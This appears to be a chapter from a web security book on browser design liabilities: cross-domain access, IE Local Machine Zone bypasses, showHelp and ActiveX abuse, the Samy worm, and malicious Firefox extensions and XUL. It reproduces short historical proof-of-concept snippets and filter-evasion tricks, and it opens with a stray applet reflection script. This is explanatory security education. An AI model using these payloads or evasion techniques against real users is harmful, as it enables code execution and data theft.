Exploits

 [script language=javascript] var c=document.applets[0].getClass().forName('sun.text.Utility'); alert('got Class object: '+c) [/script] 

 <img src=" http://zcrayfish.augurtech.com/bad.htm/bad/bad2o6.png" width=1 height=1 alt="bad2o6.png"> 

Design Liabilities

 Attack    Web client design liabilities result from by-design "features" that were intentionally put into the product that provide a consistently exploited target for attackers. There is a somewhat blurry line between unintentional implementation vulnerabilities and intentional features, which are both often used to attack design liabilities. We'll try to illustrate this subtlety with some examples.

Cross-domain Access   One of the most popular examples of this is cross-domain access attacks. Most modern browsers use a security model based on "domains," which are arbitrary security boundaries designed to prevent windows/ frames /documents/scripts from one source (usually specified by a DNS domain) from interacting with resources originating from another location. This is sometimes also referred to as the " same-origin policy," per the original Netscape JavaScript reference manuals. For example, if evilsite.com could execute JavaScript in Citibank.com, Citi's customers could be victimized by (say) a simple e-mail containing malicious script that hijacked their cookies, logged onto Citi's online banking web site, and wired cash to the Western Union location of the attacker's choice.

The history of IE cross-domain exploits is long and varied. In 2006, Matan Gillon illustrated how to inject Cascading Style Sheets (CSS) into remote web pages containing curly brackets ({ }), which are normally used to define style selectors, properties, and values. By exploiting a flaw in the IE parser for CSS, and an operational oversight by Google, Gillon crafted a proof-of-concept exploit that covertly grabbed user data when they used Google's Desktop Search utility.

In early 2005, Michael Evanchik, Paul from Greyhats Security, and http-equiv reported that the HTML Help ActiveX Control (hhctrl.ocx) did not properly determine the source of windows opened by the "Related Topics" command, permitting an attacker to open two different windows pointed to the same domain, thus connecting the parent windows across the domain security boundary. Incidentally, this hhtctrl.ocx issue was reported after Microsoft implemented its Local Machine Zone (LMZ) lockdown in Windows XP service pack 2 (XP SP2), but more on this later.

In mid-2004, Paul from GreyHats Security reported a cache confusion vulnerability with IE, where it would essentially forget the source of a cached reference to a function when the parent domain was changed, allowing an attacker to control the context in which the cached function was executed. This would allow execution of script in arbitrary domains of the attacker's choice, simply by getting the victim to view some malicious HTML. The list goes on.

Firefox fell prey to the cross-domain bug several times as well. As noted earlier, the slew of vulnerabilities announced in February 2006 included a few related to cross-domain access. Another of the more memorable Firefox cross-domain access vulnerabilities includes attacks that used Firefox's early implementation of tabbed browsing to bypass same-origin restrictions.

In January 2006, researcher Michal Zalewski exhumed one of the main design problems with the same-origin rule based on DNS names . The nature of the problem had been known for a number of years : a domain must be defined using a particular number of periods, or dots, to prevent violations of the same-origin restriction. The standard rule implemented in commercial browsers is that two or more dots defines a subdomain. This works fine in most scenarios: interaction between content from subdomains like "support.site.com" with the parent "site.com" is permitted, but its access to other domains like "othersite.com" is blocked by the same-origin rule.

However, because of the differences in international domainnaming conventions, the two-dot rule is not always reliable. Consider, for example, "site.com" versus "site.co.uk," which are likely related to the same parent organization, but would be considered separate by most browsers because of the two-dot same-origin implementation. Even worse , Zalewski proposed three ways to bypass the same-origin restrictions in certain scenarios based on defeating assumptions made by the "multidot" implementations in IE and Firefox. A link to Zalewski's paper on "Cross-Site Cooking" (as he called it) is available in "References and Further Reading."

Attacking the IE LMZ   The IE Local Machine Zone (LMZ, also known as the "My Computer" zone) is designed to differentiate between potentially malicious remote scripts and "friendly" executables loaded from the local machine. The LMZ is a "special" zone in IE's implementation of the domain security model, in which code runs with the privilege of the user running IE. Thus, attackers have traditionally sought to inject malicious code into the LMZ. LMZ injection exploits proliferated to such an extent that Microsoft finally released a feature called "Local Machine Lockdown" in Windows XP Service Pack 2 (XPSP2). Many have argued for years that the whole concept of remote access to "friendly" local scripts is unrealistic , and the LMZ design should be scrapped altogether.

Case in point, it didn't take long for notorious web client hacker http-equiv to bypass LMZ Lockdown, illustrating the ongoing challenges of defending against design liabilities. Thor Larholm offered a solid description of the underpinnings of this exploit. Essentially, the exploit uses HTML image element (IMG) with the DYNSRC attribute pointed to a remote file. When this image is drag-n-drop-ed onto a window that references local content, the file referenced in the DYNSRC attribute can be planted on the victim's machine in a known location. Http-equiv posted a demonstration exploit called "ceegar.html" that uses the AnchorClick behavior to open "C:\WINDOWS\PCHealth\" in a named window, which is then used as a drag-n-drop point for the file referenced by the DYNSRC attribute.

Rafel Ivgi posted another example of an LMZ access mechanism in mid-2004. Dutch security researcher Jelmer Kuperus (known by his online handle "jelmer") coded up proof-of-concept exploit that uses the IE showModalDialog method within a malicious web page (or HTML e-mail) that creates a modal dialog window in the upper-left corner of the user's screen (a modal dialog box retains the input focus while open; the user cannot switch windows until the dialog box is closed). The modal dialog references the location of another object, an IFRAME. Through a sort of timing trick, Jelmer changes the location of the IFRAME while the modal dialog is open, and when it closes , because of the vulnerability, the location referenced by the IFRAME is under Jelmer's control, and it is set to the LMZ. The following illustration shows Jelmer's proof-of-concept modal dialog boxyou can see from the status bar for this window that it is executing in the "Local Computer" security zone.

From here, Jelmer loads some JavaScript in more IFRAMEs located in the LMZ. These scripts do the heavy lifting , using the ADODB.stream ActiveX control installed with IE to copy an executable from his site down to the local machine and run it (he overwrites the Windows media Player executable at C:\Program Files\Windows Media Player\ wmplayer .exe to disguise its true purpose). Jelmer's executable is a harmless graphics clip, but the point is madecode can now be executed with the full privileges of the logged-on user.

In early 2004, Thor Larholm announced that specially crafted InfoTech Storage (ITS) and MIME-Encapsulated HTML (MHTML) URIs could allow malicious HTML code to run in IE's LMZ. The exploit works by referencing a malicious Compressed HTML Help (CHM) file using Microsoft's implementations of the ITS or MHTML protocols. CHMs are historically notorious for being abused as exploitation vectors. Here's an example of a malicious link that could be used to exploit this vulnerability. Note the trailing double slashes , the key to triggering the input validation error:

 ms-its:mhtml:file://C:\nosuchfile.mht! http://www.example.com//exploit.chm::exploit.html 

In this example, exploit.html will execute in the context of the LMZ. It took Microsoft over a month to release a patch for this vulnerability.

Another feature of IE that has been persistently exploited for cross-domain access is the showHelp function. showHelp is an IE window method for displaying HTML and CHM files. In 2003, Andreas Sandblad reported that file:// and res:// URIs bypassed restrictions on the type of file that showHelp could open. Here's a simple example he provided:

 showHelp("file:") showHelp("res://shdoclc.dll/about.dlg") showHelp("javascript:alert('Alert in the LMZ')") 

The first line effectively disables the security restrictions on showHelp, which is normally only able to open .htm and .chm files. The last two lines load a resource and execute JavaScript in the LMZ, respectively. Later in the same year, Arman Nayyeri reported a directory traversal flaw with showHelp that permitted remote execution of arbitrary CHM files on the victim system, in the LMZ. Nayyeri's proof-of-concept exploit is shown here (manual line breaks have been added due to page width constraints):

 showHelp("mk:@MSITStore:iexplore.chm:: ..\..\..\..\chmfile.chm::/fileinchm.html") 

Nayyeri also claimed the target CHM file is not required to have a .chm file extension if the double colon string ('::') is used in the showHelp() call.

Georgi Guninski used showHelp frequently to open CHM files containing shortcuts pointing to arbitrary code. In this example from Georgi, a CHM file containing this shortcut would launch Wordpad:

 <OBJECT   id=hh   classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"   width=100   height=100>   <PARAM name="Command" value="ShortCut">   <PARAM name="Button" value="Bitmap:shortcut">   <PARAM name="Item1" value=",wordpad.exe,">   <PARAM name="Item2" value="273,1,1"> </OBJECT> <SCRIPT> /*alert(window.location +" "+ document.URL);*/ hh.Click(); </SCRIPT> 

JavaScript and Active Scripting   Originally christened "LiveScript," and still frequently associated with Sun's Java, JavaScript is actually a wholly separate scripting language created by Netscape Communications in the mid-1990s. JavaScript is one of the most widely used client-side scripting languages on the Web today, even across Microsoft clients and online services.

JavaScript's blend of Perl-like ease-of-use with C/C++-like power was instrumental in driving this popularity. However, these exact features make it immensely attractive to malicious hackers as well. Even the simplest JavaScript methods can pop up windows and read/write cookies, making it trivial to fool users into entering sensitive information or send their sensitive data to other sites.

Microsoft platforms execute JavaScript and other client-side scripting languages (such as Microsoft's own VBScript) using a Component Object Model (COM)based technology called Active Scripting.

To be fair, the security challenges presented by JavaScript and Active Scripting don't necessarily derive from problems inherent to the technologies (although there were some published vulnerabilities in the past like any software language), but rather from their accessibility and power being easily abused to do evil. In addition, as we've seen throughout this chapter, these technologies can be a devastating tool for capitalizing on other security holes in Internet client software, especially cross-domain access violation issues discussed earlier.

Some of these problems are coming home to roost with the next -generation web technology called AJAX (Asynchronous JavaScript and XML; see Wikipedia for background). One of the most illustrative examples of the potential security ramifications of AJAX was the MySpace, or "Samy," worm that brought down the popular online social networking site MySpace.com in October 2005. One of the users of MySpace, someone called "Samy," decided to dramatically increase his popularity (defined by the number of other MySpace users who added Samy's profile to their "Friends" list) by automatically adding himself to the profile of anyone who viewed his profile, using a JavaScript exploit. Furthermore, anyone viewing a profile "infected" by viewing Samy's original profile also became infected. Within 20 hours, Samy had over a million friend requests . MySpace.com went offline for a brief period to address the spread of Samy's worm.

The very fist step of Samy's posted technical explanation (see "References and Further Reading" for a link) indicates "We needed javascript (sic) to get any of this to even work," indicating the necessarily of JavaScript in exploiting online users. The rest of Samy's explanation is a fascinating read, describing in gory details the mental gymnastics he used to evade the numerous input validation countermeasures in place on MySpace.com. Some highlights include

• Embedding JavaScript in CSS tags (MySpace blocked all other HTML tags).

• Used "java\nscript" (that is, java [NEWLINE]script) to avoid MySpace's stripping of the literal word "javascript." This turns out to be an implementation flaw in some browsers, which actually ignore the newline when interpreting this.

• Used JavaScript String.fromCharCode to convert quotes (") from decimal ASCII to avoid restrictions on quotes.

• Used the XML-HTTP object (central to AJAX functionality) to perform the heavy lifting of HTTP GETs and POSTs from/to the victim's profile (which had the added advantage of mimicking cookies and other tokens used by MySpace to block scripted access to some pages).

Pretty sophisticated stuff for someone who started out with the simple goal of easily viewing "pictures of random, hot girls whenever I please ." Web site operators should imagine what a more resourceful attacker could do to a web application like MySpace!

Abusing ActiveX   ActiveX has been the center of security debates since its inception in the mid-90s, when Fred McLain published an ActiveX control that shut down the user's system remotely. ActiveX is easily embedded in HTML using the <OBJECT> tag, and controls can be loaded from remote sites or the local system. These controls can essentially perform any task with the privilege of the caller, making them extraordinarily powerful, and also a traditional target for attackers. Microsoft's Authenticode system, based on digital signing of "trusted" controls, is the primary security countermeasure against malicious controls. (See "References and Further Reading" for more information about ActiveX and Authenticode.)

Traditionally, attackers have focused on controls that are pre-installed on victims' Windows machines, since they are already authenticated, and require no prompting of the user to instantiate. In mid-1999, Georgi Guninski and Richard M. Smith, et al., reported that the ActiveX controls marked "safe for scripting" flag could be instantiated by attackers without invoking Authenticode. This only increased the attack surface of ActiveX controls that could be used for abusive purposes. From an attacker's perspective, all you need to do is find a pre-installed ActiveX control that performs some privileged function, such as read memory or write files to disk, and you're halfway to exploit nirvana. Table 10-1 lists some of the more sensationally abused ActiveX controls from recent memory.

The Evil Side of Firefox Extensions   Firefox's Extensions are the functional equivalent of IE's ActiveX controls. If a user installs a malicious Extension, it can do anything with the privilege of the user. Firefox's security model for extensions is also quite similar to ActiveX: the end user makes the final decision about whether to install an extension or not (and which do you think they choose ten times out of ten? That's right: "Show me the dancing bunnies!"). A concrete example of a potentially abusive Firefox extension is FFsniFF by azurit, a simple Firefox extension that will parse HTTP form submissions for nonblank password fields, and if found, mail the entire form to an attacker-defined e-mail address (see "References and Further Reading" for a link to FFsniFF).

The major difference in this department is that there are a lot more ActiveX controls lying around Windows machines waiting to be tickled, but of course this may change as Firefox extensions gain popularity.

XUL   XUL (XML User Interface Language, pronounced "zool") is a user interface markup language that can be used to manipulate portions of the user interface (or "chrome") of Mozilla applications such as Firefox and Thunderbird (Mozilla's e-mail client). Some have compared XUL's security implications with that of the LMZ in IE, since it defines elements such as windows, scripts, and data sources that could easily be used to violate the same-origin policy if any implementation vulnerabilities exist.

In 2006, "moz_bug_r_a4" reported an input validation flaw in the XULDocument.persist() function that permitted injection of arbitrary XML and JavaScript code into the localstore.rdf file, which is executed with the permissions of the browser at browser launch time. This is functionally equivalent to an IE LMZ script execution vulnerability (although the browser would have to be restarted in the case of Firefox).

XUL also has implications for confusing web content for chrome. For example, in mid-2004, Jeff Smith reported that Firefox didn't restrict web sites from including arbitrary, remote XUL that can be used to hijack most of the user interface (including tool bars, SSL certificate dialogs, address bar and more), thereby controlling almost anything the user sees. The ability to control so many aspects of the Mozilla user interface creates great potential for tricking users with fraudulent windows, dialog boxes, and so on (see the upcoming "Trickery" section).